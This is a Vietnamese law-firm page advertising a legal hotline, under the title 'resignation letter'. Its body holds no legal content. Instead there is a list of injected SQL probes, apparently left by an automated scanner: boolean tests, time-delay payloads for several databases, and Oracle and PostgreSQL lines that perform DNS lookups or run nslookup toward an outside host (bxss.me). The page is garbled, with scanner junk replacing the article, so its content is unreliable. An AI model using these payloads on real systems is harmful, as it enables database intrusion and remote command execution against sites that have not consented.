Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Đơn xin nghỉ việc

Cập nhật lần cuối lúc 11:13 ngày 18/07/2014

1
1
1
1
1'"
-1 OR 2+981-981-1=0+0+0+1 --
\
-1 OR 3+981-981-1=0+0+0+1 --
-1 OR 3*2<(0+5+981-981) --
1
@@dDuEj
JyI=
-1 OR 3*2>(0+5+981-981) --
-1 OR 2+154-154-1=0+0+0+1
-1 OR 3+154-154-1=0+0+0+1
-1 OR 3*2<(0+5+154-154)
-1 OR 3*2>(0+5+154-154)
-1' OR 2+954-954-1=0+0+0+1 --
-1' OR 3+954-954-1=0+0+0+1 --
-1' OR 3*2<(0+5+954-954) --
-1' OR 3*2>(0+5+954-954) --
-1' OR 2+345-345-1=0+0+0+1 or 'A3riKOkS'='
-1' OR 3+345-345-1=0+0+0+1 or 'A3riKOkS'='
-1' OR 3*2<(0+5+345-345) or 'A3riKOkS'='
-1' OR 3*2>(0+5+345-345) or 'A3riKOkS'='
-1" OR 2+653-653-1=0+0+0+1 --
-1" OR 3+653-653-1=0+0+0+1 --
-1" OR 3*2<(0+5+653-653) --
-1" OR 3*2>(0+5+653-653) --
if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
-1; waitfor delay '0:0:9' --
-1); waitfor delay '0:0:9' --
1 waitfor delay '0:0:9' --
wjucjE1n'; waitfor delay '0:0:3' --
6jXs1lZn'; waitfor delay '0:0:0' --
-1;select pg_sleep(6); --
-1);select pg_sleep(6); --
-1));select pg_sleep(6); --
EMB1vyQR';select pg_sleep(9); --
Eqy4WvZQ');select pg_sleep(9); --
0xix6zxm'));select pg_sleep(3); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5170.34060.9f923.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5172.34060.9f923.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-5173.34060.9f923.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-5174.34060.9f923.\1.bxss.me
721'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: